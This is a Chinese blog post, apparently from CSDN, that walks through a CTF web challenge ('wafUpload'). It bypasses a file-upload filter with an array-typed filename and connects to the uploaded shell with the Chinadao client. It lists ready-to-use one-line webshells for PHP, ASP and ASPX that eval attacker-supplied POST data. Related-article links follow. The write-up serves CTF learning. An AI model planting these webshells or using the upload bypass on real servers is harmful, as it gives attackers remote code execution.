解网鼎杯一道web题(wafUpload)

最新推荐文章于 2022-08-29 11:20:00 发布
最新推荐文章于 2022-08-29 11:20:00 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: CTF 病毒 文章标签: 木马后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42196196/article/details/81989269
版权
CTF 同时被 2 个专栏收录
11 篇文章 2 订阅
订阅专栏
病毒
3 篇文章 0 订阅
订阅专栏

思路:burpsuite截取post数据包,上传木马,菜刀连接。

截取上传的数据包,对filename参数使用数组绕过,上传php.php,同时得到php.php路径。

附:
PHP一句话木马:<?php @eval($_POST['key']);?>
ASP一句话木马:<%eval request['key']%>
ASPX一句话木马:<%@ Page Language="Jscript"%><%eval(Request.Item["key"],"unsafe");%>

配置菜刀:右键添加输入木马文件地址,和post参数。

连接成功,拿到flag文件。病毒

诸神之眼
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020网鼎杯大赛部分
weixin_43070384的博客
05-14 5677
1. boom 解压之后会发现是一个可以运行的程序 运行之后会出现一个MD5乱码,这个我们通过解码会得到en5oy,然后我们输入进去会提示你进入下一关。 输入进去后我们发现方程组,我们解方程得到X=74,Y=68,Z=31 然后得到下列一元二次方程,这个方程我用的python代码算出来的得到89127561,但是我们输入进去后,会发现谈谈弹窗消失,然后我们去看这个程序的代码。 下面是部分代码截图,我们发现flag的拼接方式 拼接过后得到flag{en5oy_746831_89127561}。自
网鼎杯第二场 wafupload详解
publicStr的博客
08-26 1878
0x00 有些wp里比较简略的内容,略做些分析,顺便记录点学到的姿势   0x01 wafupload 先放源码,标了几处重点。 详细分析一下代码 第一个判断MIME就是content-type是不是image/jpeg,在burp中抓包直接改掉即可。 第二个判断比较关键,判断扩展名是否是jpg、png、gif   问出在代码是如何获取扩展名的。 1、首先,文件被上传时,判...
解网鼎杯一道web(fakebook)
洞若观火
08-23 1万+
扫描: nikto扫描: 发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑扫描,发现flag.php。 user.php.bak源码: &lt;?php class UserInfo {     public $name = "";     public $age = 0;     public $...
【干货】记一次WAF对抗赛详解&全方位绕过WAF
热门推荐
Enweitech Software Works
07-02 1万+
0x01 preview 上个星期参加了某巨头厂商承办的挑战赛,比赛周期48小时,目是成功渗透在安全宝保护下的五个通用cms靶场,其中包括论坛、商城、资源网站等 从靶场布置来看很明显是在测试安全宝对于几种不同类型cms的对攻击的防御能力。 这样的比赛模式区别于常见的CTF线上模式稍有不同,实战味道较强。常规的CTF在Web目上面主要考察的是漏洞挖掘和利用,难点一般凸显在发现难和利
upload类型目总结
limenzzz的博客
04-20 1180
你传你🐎呢
ctf-第一场网鼎杯
zhang14916的博客
09-04 2165
1.reverse-beijing 放在kali下使用file命令发现这是一个32位的elf文件,直接运行获得一串乱码,放入ida中找到main函数进行反编译,发现里面有嵌套函数,打开嵌套函数,发现函数是根据外层参数做异或,猜测这里是将flag顺序打乱后与一个密钥做异或得到我们所看到的乱码,将做异或的两行数据取出再按外层函数调用参数选定的顺序排好即可(注意有部分参数不存在是因为他们的值为0而未被...
fakebook--2018网鼎杯--攻防世界wp
4pri1
01-29 210
fakebook–2018网鼎杯 刚打开的样子 登录不行,先注册。 同时用burp suite 抓包 发现异常包robot.txt 查看后发现存在泄漏 进入下载文件并查看 注册后登录,发现将no=不存在的值会报错 结合user.php.bak发现存在get注入并且可以找到资源的物理路径 用 order by查询字段 当字段为4 返回值正常 查询数据库名 http://220.249.52.134:51172/view.php?no=-6%20union/**/select%201,grou
2022第三届“网鼎杯”网络安全大赛-青龙组 部分WriteUp
渗透测试研究中心
08-29 6461
MISC 签到 八道网络安全选择,百度都能搜索到答案,这里如果只知道部分目答案,可以通过枚举测试fuzz答案,获得flag flag: flag{a236b34b-8040-4ea5-9e1c-97169aa3f43a} RE re693 直接下载附件用golang打开 看main函数可以发现会打印两句话,要求输入有六个参数并且第三个为gLIhR的函数、被调用三次并且会调用到cHZv5......
i春秋-CTF-web文件上传
在Web和Reverse坑里游泳中。。。。
04-27 1649
前言 本来吧,悄悄摸鱼,想整点啥打发时间,看视频太明显,于是做做,眉头紧锁,仔细思考,装作工作很难的样子。 这回选择web类型的目,主要是好久没做了,手有点生,找个简单的文件上传练练。 打开目环境发现: 好像是没有什么特别的。 但是往下翻看却是别有洞天。 众所周知,php是后端语言,正常情况下前端是看不到的,也就是说,出人还是很贴心的(虽然我觉得出人没那么好心)。 <?php header("Content-Type:text/html; charset=utf.
网鼎杯2022白虎组目分享
09-06
逆向,pwn,misc,加解密目,网鼎杯2022,白虎组,ctf
网鼎杯密码
05-01
网鼎杯密码chaoyang.txt,加密方式暂不说,想知道解流程可以讨论
2020网鼎杯.zip
07-20
2020网鼎杯 逆向 pwn 密码 隐写赛,除web外均有
2022第三届网鼎杯白虎组misc830原附件
09-03
2022第三届网鼎杯白虎组misc830原附件
2022网鼎杯初赛朱雀组赛
10-18
2022网鼎杯初赛朱雀组赛
就南邮攻防平台一道web(AAencode),论颜文字js解密
洞若观火
09-25 8330
根据目AAencode可以判断出,这是一道颜文字js加密,但是密文不应该是这样的,单击查看--&gt;文字解码--&gt;unicode 然后密文变为以下样式: 打开控制台,将密文复制下来,在控制台中跑一下,得到flag。...
流量分析目(流量检索,数据提取,数据重组,伪加密,图片提取)
洞若观火
10-21 5823
流量检索: 将数据包加入科来进行分析,当然wireshark也可以,但是科来的数据可视化做的比较好。 找到了一个比较大的数据包,打开看看。。。 数据提取: 搜索关键字flag。。。果然在这里,使用wireshark进行数据的提取,看大小应该就是这几个了 数据重组: 挨个保存,最好编个号,以免重组的时候乱了顺序 一共保存了五个数据包,以上所选是每个包的包头,需要去掉...
还原HITCON 2016一道web(php反序列化漏洞)
洞若观火
07-27 3245
实验环境搭建:PHPstudy,火狐(backbar),notepad++; 原目代码:https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2016/babytrick 本人在还原此目时,因为mysql数据库用户名密码和方便调试等原因对源码的一些参数做了一些相应的改动,但是没有改变主要代码。 c...
USB键盘流量分析
洞若观火
10-21 3236
先使用命令:tshark -r data.pcap -T fields -e usb.capdata 将数据提取出来 对照下列编码写出脚本,还原数据 USB键盘数据包含8个字节 BYTE1 -- 特殊按键         |--bit0:   Left Control是否按下,按下为1           |--bit1:   Left Shift  是否按下,按下为1           |...
解网鼎杯一道web(Calc)
洞若观火
08-23 2402
探测:roboot.txt 回显: Traceback (most recent call last):   File "/usr/local/lib/python2.7/dist-packages/tornado/web.py", line 1520, in _execute     result = self.prepare()   File "/usr/local/lib/python2....
[网鼎杯 2020 朱雀组]phpweb
最新发布
03-16
phpweb是一种基于PHP语言开发的Web应用程序框架,它提供了一系列的工具和函数库,使得开发者可以更加高效地构建Web应用程序。phpweb具有易于学习、易于使用、易于扩展等特点,因此在Web应用程序开发中得到了广泛的应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值